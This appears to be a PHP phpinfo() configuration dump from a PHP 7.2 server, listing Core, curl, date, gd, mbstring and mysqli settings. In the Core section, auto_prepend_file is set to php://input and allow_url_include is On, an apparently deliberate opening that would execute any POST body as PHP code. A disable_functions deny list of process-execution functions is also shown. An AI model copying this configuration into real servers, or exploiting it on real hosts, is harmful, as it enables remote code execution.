2MgfYTQYX1WE1moaaQJfKEFTs/camkXnUwt9YtNWPiuc67VmRlb0yiRgS/cAe7is0QXuTAm9kikM2DNc5OkeGRaMU8tq0TJHbUCOtezMeRfITiSv1PLLbGE5gb/NOB/1AuR1KlLETDltidyR4XIPasyEnc6eIbRa9kfNifFeXJOAnVJBiKfFCvobcLKccLHWojHJpIPH3iXQlpoNLrdcH44sucvmQOHHjZ9rDrGdbixVmbk/XGy4mtiKuoQDjmQpFJLs6wuSZvqKmL0ky6zOZLry+420UKUaue5ooyeqy9+iopgM989cp1Dcp16bSU1tOJbyFyjedTID5wOk6OAUFFXUDKFRLkmBM3xH7fzIJwPLsxexDMWP2b8g38DqN45ywCuH0VNuv+XmjwOYCjtUakbg6AkGlNoQGBMB5A9g8hh2g7zFE2U4F35FxfHfmwwbxcz3Yl32C/oAwPwDAS6UXdpOhXPZ27Trc9R/SLTla0zzGoXl2QAexnLVZJB/CZMpV7HthfL4lJIrb54u+tdv3/rCiSbw+k88yM9ZxXgKwlHmZycq13iSr0KeMHmUZw6r1VICrLT4D5fy4wq/5DAvfjaWC9oAd9KxwTNUJynUjL+EqpwSTME1zOWMBuIxmZ7p9RCsNq+NmdxW09I1MdNkJeYZNHsIt0qKEO2Z4kvmHadS+Xqv2cqzc93rpuhdl54tg2DISuJljBW3uZjMHrAPqHOYK6zPIM23G2+14Rts4cyLbdxo3Y667UskOo/W/m/PwRhQBwZFkT2vXzDbTtLMZCyfP1155bbfDrpjKZoYH41bO+d97jmEgMPVxFMF0iHESIkiNtDhKuwV058cw0dBZNP+lFsSU/6VWf0E4P/x+IF2eJnokr4uW/2jAKPYjjRb7Cxef70c3qsCl0im1Gj/Uu2eF6sWo0rUiTQq7zS+pYjywnXYwcyOZfI4mKgHj9N2ttHqbRfSlQXhjw5XXy4S7ZbzOovkxVRsphHp8ia3HlyleZS1zHcvoVrdjuNFdEe7edGHzSbpSria/WZ3+cxYV5DCx/4w7FUfyfTW0WO+i7x2YrzKUXZFw/sut+OxJDGkHUxEZPwgCquQcIgxZR9oXekDQk8FF60bqwocupaIoEz6EmaC3C+0Ro6Wgp4eb2tpPJqN+4xXFXQ3TfUfCc5PDNnLZDpLIV1NADKyjZa87mHgmWX57bYdIfIY3pdCGf43xQUXI62kBn3fZxi4SPC8crIjDQ4yzFAaz/XcPJn7xf03VRzIB5Z7qCbBzPQi5jga2E9bCD+ELug8ficEZCk/Cmj8Ro3aLtLxDR1/QffhIHNRTUZCf+S5G7SJBp2b7G31B9+EjcVAFEInZQ2LU7jiN1zf4gu7DR+KwTvkfO9bGx6BNnEQ8XXmN5cT3fEH34SNxwN4A9dgknIEwyWNbeRTwV7WYHBVwFQfbwKb7vOUjiYAiKVT1PczXqCLD/n5UbuLcNxTKoCgExSFNmsFCHI6iJBQFnUbqqbWPHyFceDAOrC/oPpIN+FVaVLrNUa6dLPbvoEQdO4pd1OUylBVkCutsOkqosbNvwcE6qL6g+0hG3MY4ejots1pT3kE4P9QDdfuLKeDfHswD6gu6j2TF2yQcLoqEGurre9EdP1QTfmxJRdn0NlrvD+jmY69Egz+UQvxfgAEALJ4EcRDa/toAAAAASUVORK5CYII=" alt="Zend logo" /></a>
 62 | This program makes use of the Zend Scripting Language Engine:<br />Zend&nbsp;Engine&nbsp;v3.2.0,&nbsp;Copyright&nbsp;(c)&nbsp;1998-2018&nbsp;Zend&nbsp;Technologies<br /></td></tr>
 63 | </table>
 64 | <hr />
 65 | <h1>Configuration</h1>
 66 | <h2><a name="module_bcmath">bcmath</a></h2>
 67 | <table>
 68 | <tr><td class="e">BCMath support </td><td class="v">enabled </td></tr>
 69 | </table>
 70 | <table>
 71 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
 72 | <tr><td class="e">bcmath.scale</td><td class="v">0</td><td class="v">0</td></tr>
 73 | </table>
 74 | <h2><a name="module_cgi-fcgi">cgi-fcgi</a></h2>
 75 | <table>
 76 | <tr><td class="e">php-fpm </td><td class="v">active </td></tr>
 77 | </table>
 78 | <table>
 79 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
 80 | <tr><td class="e">cgi.discard_path</td><td class="v">0</td><td class="v">0</td></tr>
 81 | <tr><td class="e">cgi.fix_pathinfo</td><td class="v">1</td><td class="v">1</td></tr>
 82 | <tr><td class="e">cgi.force_redirect</td><td class="v">1</td><td class="v">1</td></tr>
 83 | <tr><td class="e">cgi.nph</td><td class="v">0</td><td class="v">0</td></tr>
 84 | <tr><td class="e">cgi.redirect_status_env</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
 85 | <tr><td class="e">cgi.rfc2616_headers</td><td class="v">0</td><td class="v">0</td></tr>
 86 | <tr><td class="e">fastcgi.error_header</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
 87 | <tr><td class="e">fastcgi.logging</td><td class="v">1</td><td class="v">1</td></tr>
 88 | <tr><td class="e">fpm.config</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
 89 | </table>
 90 | <h2><a name="module_core">Core</a></h2>
 91 | <table>
 92 | <tr><td class="e">PHP Version </td><td class="v">7.2.33 </td></tr>
 93 | </table>
 94 | <table>
 95 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
 96 | <tr><td class="e">allow_url_fopen</td><td class="v">On</td><td class="v">On</td></tr>
 97 | <tr><td class="e">allow_url_include</td><td class="v">On</td><td class="v">On</td></tr>
 98 | <tr><td class="e">arg_separator.input</td><td class="v">&amp;</td><td class="v">&amp;</td></tr>
 99 | <tr><td class="e">arg_separator.output</td><td class="v">&amp;</td><td class="v">&amp;</td></tr>
100 | <tr><td class="e">auto_append_file</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
101 | <tr><td class="e">auto_globals_jit</td><td class="v">On</td><td class="v">On</td></tr>
102 | <tr><td class="e">auto_prepend_file</td><td class="v">php://input</td><td class="v">php://input</td></tr>
103 | <tr><td class="e">browscap</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
104 | <tr><td class="e">default_charset</td><td class="v">UTF-8</td><td class="v">UTF-8</td></tr>
105 | <tr><td class="e">default_mimetype</td><td class="v">text/html</td><td class="v">text/html</td></tr>
106 | <tr><td class="e">disable_classes</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
107 | <tr><td class="e">disable_functions</td><td class="v">passthru,putenv,chroot,chgrp,chown,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv</td><td class="v">passthru,putenv,chroot,chgrp,chown,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv</td></tr>
108 | <tr><td class="e">display_errors</td><td class="v">On</td><td class="v">On</td></tr>
109 | <tr><td class="e">display_startup_errors</td><td class="v">Off</td><td class="v">Off</td></tr>
110 | <tr><td class="e">doc_root</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
111 | <tr><td class="e">docref_ext</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
112 | <tr><td class="e">docref_root</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
113 | <tr><td class="e">enable_dl</td><td class="v">Off</td><td class="v">Off</td></tr>
114 | <tr><td class="e">enable_post_data_reading</td><td class="v">On</td><td class="v">On</td></tr>
115 | <tr><td class="e">error_append_string</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
116 | <tr><td class="e">error_log</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
117 | <tr><td class="e">error_prepend_string</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
118 | <tr><td class="e">error_reporting</td><td class="v">32759</td><td class="v">32759</td></tr>
119 | <tr><td class="e">expose_php</td><td class="v">Off</td><td class="v">Off</td></tr>
120 | <tr><td class="e">extension_dir</td><td class="v">/www/server/php/72/lib/php/extensions/no-debug-non-zts-20170718</td><td class="v">/www/server/php/72/lib/php/extensions/no-debug-non-zts-20170718</td></tr>
121 | <tr><td class="e">file_uploads</td><td class="v">On</td><td class="v">On</td></tr>
122 | <tr><td class="e">hard_timeout</td><td class="v">2</td><td class="v">2</td></tr>
123 | <tr><td class="e">highlight.comment</td><td class="v"><font style="color: #FF8000">#FF8000</font></td><td class="v"><font style="color: #FF8000">#FF8000</font></td></tr>
124 | <tr><td class="e">highlight.default</td><td class="v"><font style="color: #0000BB">#0000BB</font></td><td class="v"><font style="color: #0000BB">#0000BB</font></td></tr>
125 | <tr><td class="e">highlight.html</td><td class="v"><font style="color: #000000">#000000</font></td><td class="v"><font style="color: #000000">#000000</font></td></tr>
126 | <tr><td class="e">highlight.keyword</td><td class="v"><font style="color: #007700">#007700</font></td><td class="v"><font style="color: #007700">#007700</font></td></tr>
127 | <tr><td class="e">highlight.string</td><td class="v"><font style="color: #DD0000">#DD0000</font></td><td class="v"><font style="color: #DD0000">#DD0000</font></td></tr>
128 | <tr><td class="e">html_errors</td><td class="v">On</td><td class="v">On</td></tr>
129 | <tr><td class="e">ignore_repeated_errors</td><td class="v">Off</td><td class="v">Off</td></tr>
130 | <tr><td class="e">ignore_repeated_source</td><td class="v">Off</td><td class="v">Off</td></tr>
131 | <tr><td class="e">ignore_user_abort</td><td class="v">Off</td><td class="v">Off</td></tr>
132 | <tr><td class="e">implicit_flush</td><td class="v">Off</td><td class="v">Off</td></tr>
133 | <tr><td class="e">include_path</td><td class="v">.:/www/server/php/72/lib/php</td><td class="v">.:/www/server/php/72/lib/php</td></tr>
134 | <tr><td class="e">input_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
135 | <tr><td class="e">internal_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
136 | <tr><td class="e">log_errors</td><td class="v">On</td><td class="v">On</td></tr>
137 | <tr><td class="e">log_errors_max_len</td><td class="v">1024</td><td class="v">1024</td></tr>
138 | <tr><td class="e">mail.add_x_header</td><td class="v">Off</td><td class="v">Off</td></tr>
139 | <tr><td class="e">mail.force_extra_parameters</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
140 | <tr><td class="e">mail.log</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
141 | <tr><td class="e">max_execution_time</td><td class="v">300</td><td class="v">300</td></tr>
142 | <tr><td class="e">max_file_uploads</td><td class="v">20</td><td class="v">20</td></tr>
143 | <tr><td class="e">max_input_nesting_level</td><td class="v">64</td><td class="v">64</td></tr>
144 | <tr><td class="e">max_input_time</td><td class="v">60</td><td class="v">60</td></tr>
145 | <tr><td class="e">max_input_vars</td><td class="v">1000</td><td class="v">1000</td></tr>
146 | <tr><td class="e">memory_limit</td><td class="v">128M</td><td class="v">128M</td></tr>
147 | <tr><td class="e">open_basedir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
148 | <tr><td class="e">output_buffering</td><td class="v">4096</td><td class="v">4096</td></tr>
149 | <tr><td class="e">output_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
150 | <tr><td class="e">output_handler</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
151 | <tr><td class="e">post_max_size</td><td class="v">50M</td><td class="v">50M</td></tr>
152 | <tr><td class="e">precision</td><td class="v">14</td><td class="v">14</td></tr>
153 | <tr><td class="e">realpath_cache_size</td><td class="v">4096K</td><td class="v">4096K</td></tr>
154 | <tr><td class="e">realpath_cache_ttl</td><td class="v">120</td><td class="v">120</td></tr>
155 | <tr><td class="e">register_argc_argv</td><td class="v">Off</td><td class="v">Off</td></tr>
156 | <tr><td class="e">report_memleaks</td><td class="v">On</td><td class="v">On</td></tr>
157 | <tr><td class="e">report_zend_debug</td><td class="v">On</td><td class="v">On</td></tr>
158 | <tr><td class="e">request_order</td><td class="v">GP</td><td class="v">GP</td></tr>
159 | <tr><td class="e">sendmail_from</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
160 | <tr><td class="e">sendmail_path</td><td class="v">/usr/sbin/sendmail&nbsp;-t&nbsp;-i</td><td class="v">/usr/sbin/sendmail&nbsp;-t&nbsp;-i</td></tr>
161 | <tr><td class="e">serialize_precision</td><td class="v">-1</td><td class="v">-1</td></tr>
162 | <tr><td class="e">short_open_tag</td><td class="v">On</td><td class="v">On</td></tr>
163 | <tr><td class="e">SMTP</td><td class="v">localhost</td><td class="v">localhost</td></tr>
164 | <tr><td class="e">smtp_port</td><td class="v">25</td><td class="v">25</td></tr>
165 | <tr><td class="e">sys_temp_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
166 | <tr><td class="e">track_errors</td><td class="v">Off</td><td class="v">Off</td></tr>
167 | <tr><td class="e">unserialize_callback_func</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
168 | <tr><td class="e">upload_max_filesize</td><td class="v">50M</td><td class="v">50M</td></tr>
169 | <tr><td class="e">upload_tmp_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
170 | <tr><td class="e">user_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
171 | <tr><td class="e">user_ini.cache_ttl</td><td class="v">300</td><td class="v">300</td></tr>
172 | <tr><td class="e">user_ini.filename</td><td class="v">.user.ini</td><td class="v">.user.ini</td></tr>
173 | <tr><td class="e">variables_order</td><td class="v">GPCS</td><td class="v">GPCS</td></tr>
174 | <tr><td class="e">xmlrpc_error_number</td><td class="v">0</td><td class="v">0</td></tr>
175 | <tr><td class="e">xmlrpc_errors</td><td class="v">Off</td><td class="v">Off</td></tr>
176 | <tr><td class="e">zend.assertions</td><td class="v">-1</td><td class="v">-1</td></tr>
177 | <tr><td class="e">zend.detect_unicode</td><td class="v">On</td><td class="v">On</td></tr>
178 | <tr><td class="e">zend.enable_gc</td><td class="v">On</td><td class="v">On</td></tr>
179 | <tr><td class="e">zend.multibyte</td><td class="v">Off</td><td class="v">Off</td></tr>
180 | <tr><td class="e">zend.script_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
181 | <tr><td class="e">zend.signal_check</td><td class="v">Off</td><td class="v">Off</td></tr>
182 | </table>
183 | <h2><a name="module_ctype">ctype</a></h2>
184 | <table>
185 | <tr><td class="e">ctype functions </td><td class="v">enabled </td></tr>
186 | </table>
187 | <h2><a name="module_curl">curl</a></h2>
188 | <table>
189 | <tr><td class="e">cURL support </td><td class="v">enabled </td></tr>
190 | <tr><td class="e">cURL Information </td><td class="v">7.70.0 </td></tr>
191 | <tr><td class="e">Age </td><td class="v">6 </td></tr>
192 | <tr><td class="e">Features </td></tr>
193 | <tr><td class="e">AsynchDNS </td><td class="v">Yes </td></tr>
194 | <tr><td class="e">CharConv </td><td class="v">No </td></tr>
195 | <tr><td class="e">Debug </td><td class="v">No </td></tr>
196 | <tr><td class="e">GSS-Negotiate </td><td class="v">No </td></tr>
197 | <tr><td class="e">IDN </td><td class="v">No </td></tr>
198 | <tr><td class="e">IPv6 </td><td class="v">Yes </td></tr>
199 | <tr><td class="e">krb4 </td><td class="v">No </td></tr>
200 | <tr><td class="e">Largefile </td><td class="v">Yes </td></tr>
201 | <tr><td class="e">libz </td><td class="v">Yes </td></tr>
202 | <tr><td class="e">NTLM </td><td class="v">Yes </td></tr>
203 | <tr><td class="e">NTLMWB </td><td class="v">Yes </td></tr>
204 | <tr><td class="e">SPNEGO </td><td class="v">No </td></tr>
205 | <tr><td class="e">SSL </td><td class="v">Yes </td></tr>
206 | <tr><td class="e">SSPI </td><td class="v">No </td></tr>
207 | <tr><td class="e">TLS-SRP </td><td class="v">Yes </td></tr>
208 | <tr><td class="e">HTTP2 </td><td class="v">No </td></tr>
209 | <tr><td class="e">GSSAPI </td><td class="v">No </td></tr>
210 | <tr><td class="e">KERBEROS5 </td><td class="v">No </td></tr>
211 | <tr><td class="e">UNIX_SOCKETS </td><td class="v">Yes </td></tr>
212 | <tr><td class="e">PSL </td><td class="v">No </td></tr>
213 | <tr><td class="e">Protocols </td><td class="v">dict, file, ftp, ftps, gopher, http, https, imap, imaps, pop3, pop3s, rtsp, smb, smbs, smtp, smtps, telnet, tftp </td></tr>
214 | <tr><td class="e">Host </td><td class="v">x86_64-pc-linux-gnu </td></tr>
215 | <tr><td class="e">SSL Version </td><td class="v">OpenSSL/1.0.2u </td></tr>
216 | <tr><td class="e">ZLib Version </td><td class="v">1.2.7 </td></tr>
217 | </table>
218 | <h2><a name="module_date">date</a></h2>
219 | <table>
220 | <tr><td class="e">date/time support </td><td class="v">enabled </td></tr>
221 | <tr><td class="e">timelib version </td><td class="v">2017.09 </td></tr>
222 | <tr><td class="e">&quot;Olson&quot; Timezone Database Version </td><td class="v">2018.9 </td></tr>
223 | <tr><td class="e">Timezone Database </td><td class="v">internal </td></tr>
224 | <tr><td class="e">Default timezone </td><td class="v">PRC </td></tr>
225 | </table>
226 | <table>
227 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
228 | <tr><td class="e">date.default_latitude</td><td class="v">31.7667</td><td class="v">31.7667</td></tr>
229 | <tr><td class="e">date.default_longitude</td><td class="v">35.2333</td><td class="v">35.2333</td></tr>
230 | <tr><td class="e">date.sunrise_zenith</td><td class="v">90.583333</td><td class="v">90.583333</td></tr>
231 | <tr><td class="e">date.sunset_zenith</td><td class="v">90.583333</td><td class="v">90.583333</td></tr>
232 | <tr><td class="e">date.timezone</td><td class="v">PRC</td><td class="v">PRC</td></tr>
233 | </table>
234 | <h2><a name="module_dom">dom</a></h2>
235 | <table>
236 | <tr><td class="e">DOM/XML </td><td class="v">enabled </td></tr>
237 | <tr><td class="e">DOM/XML API Version </td><td class="v">20031129 </td></tr>
238 | <tr><td class="e">libxml Version </td><td class="v">2.9.1 </td></tr>
239 | <tr><td class="e">HTML Support </td><td class="v">enabled </td></tr>
240 | <tr><td class="e">XPath Support </td><td class="v">enabled </td></tr>
241 | <tr><td class="e">XPointer Support </td><td class="v">enabled </td></tr>
242 | <tr><td class="e">Schema Support </td><td class="v">enabled </td></tr>
243 | <tr><td class="e">RelaxNG Support </td><td class="v">enabled </td></tr>
244 | </table>
245 | <h2><a name="module_filter">filter</a></h2>
246 | <table>
247 | <tr><td class="e">Input Validation and Filtering </td><td class="v">enabled </td></tr>
248 | <tr><td class="e">Revision </td><td class="v">$Id: 5a34caaa246b9df197f4b43af8ac66a07464fe4b $ </td></tr>
249 | </table>
250 | <table>
251 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
252 | <tr><td class="e">filter.default</td><td class="v">unsafe_raw</td><td class="v">unsafe_raw</td></tr>
253 | <tr><td class="e">filter.default_flags</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
254 | </table>
255 | <h2><a name="module_ftp">ftp</a></h2>
256 | <table>
257 | <tr><td class="e">FTP support </td><td class="v">enabled </td></tr>
258 | <tr><td class="e">FTPS support </td><td class="v">enabled </td></tr>
259 | </table>
260 | <h2><a name="module_gd">gd</a></h2>
261 | <table>
262 | <tr><td class="e">GD Support </td><td class="v">enabled </td></tr>
263 | <tr><td class="e">GD Version </td><td class="v">bundled (2.1.0 compatible) </td></tr>
264 | <tr><td class="e">FreeType Support </td><td class="v">enabled </td></tr>
265 | <tr><td class="e">FreeType Linkage </td><td class="v">with freetype </td></tr>
266 | <tr><td class="e">FreeType Version </td><td class="v">2.8.0 </td></tr>
267 | <tr><td class="e">GIF Read Support </td><td class="v">enabled </td></tr>
268 | <tr><td class="e">GIF Create Support </td><td class="v">enabled </td></tr>
269 | <tr><td class="e">JPEG Support </td><td class="v">enabled </td></tr>
270 | <tr><td class="e">libJPEG Version </td><td class="v">6b </td></tr>
271 | <tr><td class="e">PNG Support </td><td class="v">enabled </td></tr>
272 | <tr><td class="e">libPNG Version </td><td class="v">1.5.13 </td></tr>
273 | <tr><td class="e">WBMP Support </td><td class="v">enabled </td></tr>
274 | <tr><td class="e">XBM Support </td><td class="v">enabled </td></tr>
275 | </table>
276 | <table>
277 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
278 | <tr><td class="e">gd.jpeg_ignore_warning</td><td class="v">1</td><td class="v">1</td></tr>
279 | </table>
280 | <h2><a name="module_gettext">gettext</a></h2>
281 | <table>
282 | <tr><td class="e">GetText Support </td><td class="v">enabled </td></tr>
283 | </table>
284 | <h2><a name="module_hash">hash</a></h2>
285 | <table>
286 | <tr><td class="e">hash support </td><td class="v">enabled </td></tr>
287 | <tr><td class="e">Hashing Engines </td><td class="v">md2 md4 md5 sha1 sha224 sha256 sha384 sha512/224 sha512/256 sha512 sha3-224 sha3-256 sha3-384 sha3-512 ripemd128 ripemd160 ripemd256 ripemd320 whirlpool tiger128,3 tiger160,3 tiger192,3 tiger128,4 tiger160,4 tiger192,4 snefru snefru256 gost gost-crypto adler32 crc32 crc32b fnv132 fnv1a32 fnv164 fnv1a64 joaat haval128,3 haval160,3 haval192,3 haval224,3 haval256,3 haval128,4 haval160,4 haval192,4 haval224,4 haval256,4 haval128,5 haval160,5 haval192,5 haval224,5 haval256,5  </td></tr>
288 | </table>
289 | <table>
290 | <tr><td class="e">MHASH support </td><td class="v">Enabled </td></tr>
291 | <tr><td class="e">MHASH API Version </td><td class="v">Emulated Support </td></tr>
292 | </table>
293 | <h2><a name="module_iconv">iconv</a></h2>
294 | <table>
295 | <tr><td class="e">iconv support </td><td class="v">enabled </td></tr>
296 | <tr><td class="e">iconv implementation </td><td class="v">glibc </td></tr>
297 | <tr><td class="e">iconv library version </td><td class="v">2.17 </td></tr>
298 | </table>
299 | <table>
300 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
301 | <tr><td class="e">iconv.input_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
302 | <tr><td class="e">iconv.internal_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
303 | <tr><td class="e">iconv.output_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
304 | </table>
305 | <h2><a name="module_intl">intl</a></h2>
306 | <table>
307 | <tr class="h"><th>Internationalization support</th><th>enabled</th></tr>
308 | <tr><td class="e">version </td><td class="v">1.1.0 </td></tr>
309 | <tr><td class="e">ICU version </td><td class="v">50.2 </td></tr>
310 | <tr><td class="e">ICU Data version </td><td class="v">50.2 </td></tr>
311 | <tr><td class="e">ICU TZData version </td><td class="v">2018e </td></tr>
312 | <tr><td class="e">ICU Unicode version </td><td class="v">6.2 </td></tr>
313 | </table>
314 | <table>
315 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
316 | <tr><td class="e">intl.default_locale</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
317 | <tr><td class="e">intl.error_level</td><td class="v">0</td><td class="v">0</td></tr>
318 | <tr><td class="e">intl.use_exceptions</td><td class="v">0</td><td class="v">0</td></tr>
319 | </table>
320 | <h2><a name="module_json">json</a></h2>
321 | <table>
322 | <tr><td class="e">json support </td><td class="v">enabled </td></tr>
323 | <tr><td class="e">json version </td><td class="v">1.6.0 </td></tr>
324 | </table>
325 | <h2><a name="module_libxml">libxml</a></h2>
326 | <table>
327 | <tr><td class="e">libXML support </td><td class="v">active </td></tr>
328 | <tr><td class="e">libXML Compiled Version </td><td class="v">2.9.1 </td></tr>
329 | <tr><td class="e">libXML Loaded Version </td><td class="v">20901 </td></tr>
330 | <tr><td class="e">libXML streams </td><td class="v">enabled </td></tr>
331 | </table>
332 | <h2><a name="module_mbstring">mbstring</a></h2>
333 | <table>
334 | <tr><td class="e">Multibyte Support </td><td class="v">enabled </td></tr>
335 | <tr><td class="e">Multibyte string engine </td><td class="v">libmbfl </td></tr>
336 | <tr><td class="e">HTTP input encoding translation </td><td class="v">disabled </td></tr>
337 | <tr><td class="e">libmbfl version </td><td class="v">1.3.2 </td></tr>
338 | <tr><td class="e">oniguruma version </td><td class="v">6.3.0 </td></tr>
339 | </table>
340 | <table>
341 | <tr class="h"><th>mbstring extension makes use of "streamable kanji code filter and converter", which is distributed under the GNU Lesser General Public License version 2.1.</th></tr>
342 | </table>
343 | <table>
344 | <tr><td class="e">Multibyte (japanese) regex support </td><td class="v">enabled </td></tr>
345 | <tr><td class="e">Multibyte regex (oniguruma) backtrack check </td><td class="v">On </td></tr>
346 | <tr><td class="e">Multibyte regex (oniguruma) version </td><td class="v">6.3.0 </td></tr>
347 | </table>
348 | <table>
349 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
350 | <tr><td class="e">mbstring.detect_order</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
351 | <tr><td class="e">mbstring.encoding_translation</td><td class="v">Off</td><td class="v">Off</td></tr>
352 | <tr><td class="e">mbstring.func_overload</td><td class="v">0</td><td class="v">0</td></tr>
353 | <tr><td class="e">mbstring.http_input</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
354 | <tr><td class="e">mbstring.http_output</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
355 | <tr><td class="e">mbstring.http_output_conv_mimetypes</td><td class="v">^(text/|application/xhtml\+xml)</td><td class="v">^(text/|application/xhtml\+xml)</td></tr>
356 | <tr><td class="e">mbstring.internal_encoding</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
357 | <tr><td class="e">mbstring.language</td><td class="v">neutral</td><td class="v">neutral</td></tr>
358 | <tr><td class="e">mbstring.strict_detection</td><td class="v">Off</td><td class="v">Off</td></tr>
359 | <tr><td class="e">mbstring.substitute_character</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
360 | </table>
361 | <h2><a name="module_mysqli">mysqli</a></h2>
362 | <table>
363 | <tr class="h"><th>MysqlI Support</th><th>enabled</th></tr>
364 | <tr><td class="e">Client API library version </td><td class="v">mysqlnd 5.0.12-dev - 20150407 - $Id: 3591daad22de08524295e1bd073aceeff11e6579 $ </td></tr>
365 | <tr><td class="e">Active Persistent Links </td><td class="v">0 </td></tr>
366 | <tr><td class="e">Inactive Persistent Links </td><td class="v">0 </td></tr>
367 | <tr><td class="e">Active Links </td><td class="v">0 </td></tr>
368 | </table>
369 | <table>
370 | <tr class="h"><th>Directive</th><th>Local Value</th><th>Master Value</th></tr>
371 | <tr><td class="e">mysqli.allow_local_infile</td><td class="v">Off</td><td class="v">Off</td></tr>
372 | <tr><td class="e">mysqli.allow_persistent</td><td class="v">On</td><td class="v">On</td></tr>
373 | <tr><td class="e">mysqli.default_host</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
374 | <tr><td class="e">mysqli.default_port</td><td class="v">3306</td><td class="v">3306</td></tr>
375 | <tr><td class="e">mysqli.default_pw</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
376 | <tr><td class="e">mysqli.default_socket</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
377 | <tr><td class="e">mysqli.default_user</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
378 | <tr><td class="e">mysqli.max_links</td><td class="v">Unlimited</td><td class="v">Unlimited</td></tr>
379 | <tr><td class="e">mysqli.max_persistent</td><td class="v">Unlimited</td><td class="v">Unlimited</td></tr>
380 | <tr><td class="e">mysqli.reconnect</td><td class="v">Off</td><td class="v">Off</td></tr>
381 | <tr><td class="e">mysqli.rollback_on_cached_plink</td><td class="v">Off</td><td class="v">Off</td></tr>
382 | </table>
383 | <h2><a name="module_mysqlnd">mysqlnd</a></h2>
384 | <table>
385 | <tr class="h"><th>mysqlnd</th><th>enabled</th></tr>
386 | <tr><td class="e">Version </td><td class="v">mysqlnd 5.0.12-dev - 20150407 - $Id: 3591daad22de08524295e1bd073aceeff11e6579 $ </td></tr>
387 | <tr><td class="e">Compression </td><td class="v">supported </td></tr>
388 | <tr><td class="e">core SSL </td><td class="v">supported </td></tr>
389 | <tr><td class="e">extended SSL </td><td class="v">supported </td></tr>
390 | <tr><td class="e">Command buffer size </td><td class="v">4096 </td></tr>
391 | <tr><td class="e">Read buffer size </td><td class="v">32768 </td></tr>
392 | <tr><td class="e">Read timeout </td><td class="v">86400 </td></tr>
393 | <tr><td class="e">Collecting statistics </td><td class="v">Yes </td></tr>
394 | <tr><td class="e">Collecting memory statistics </td><td class="v">No </td></tr>
395 | <tr><td class="e">Tracing </td><td class="v">n/a </td></tr>
396 | <tr><td class="e">Loaded plugins </td><td class="v">mysqlnd,debug_trace,auth_plugin_mysql_native_password,auth_plugin_mysql_clear_password,auth_plugin_sha256_password </td></tr>
